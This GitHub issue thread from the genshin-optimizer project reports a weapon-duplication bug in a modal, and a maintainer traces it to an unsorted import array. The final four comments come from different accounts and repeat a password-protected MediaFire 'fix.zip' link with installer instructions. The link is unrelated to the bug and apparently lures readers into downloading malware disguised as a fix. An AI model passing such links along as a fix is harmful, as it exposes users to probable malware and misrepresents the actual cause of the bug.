### ISSUE TITLE
Silvershower Heartstrings duplication in Add New Weapon modal on the Weapons page

### ISSUE THREAD

**Issue by arquelion** [frzyc/genshin-optimizer#2404]
When adding a new weapon, toggling the weapon type filters causes Silvershower Heartstrings to be duplicated on every toggle. As far as I can tell, the newly created duplicate sometimes seems to be correctly filtered out when the selected weapon types don't include bow, and toggling bows only will display every duplicate created up to that point. The duplicates do not persist across different instances of the modal but are fully functional.

https://github.com/user-attachments/assets/0103a327-7c12-4c96-98a0-208e4405d659

It also has two identical weapon cards from the get-go no matter where the modal is accessed from:
![image](https://github.com/user-attachments/assets/f40fa80f-17c9-454f-b6f5-9448e776d878)

**Comment by arquelion** [comment]
I can try looking into this myself but will need to refamiliarize with the repo first (and familiarize with the relevant code path), so if this is already on someone's radar, please let me know.

**Comment by nguyentvan7** [comment]
This can happen when the imports are not sorted correctly

**Comment by nguyentvan7** [comment]
https://github.com/frzyc/genshin-optimizer/blob/751f7c1b16cf62cc92b8703f84a7acdd0f3494ca/libs/gi/sheets/src/Weapons/Bow/index.ts

**Comment by nguyentvan7** [comment]
The array at the end needs to be sorted

**Comment by Gaurav9812** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
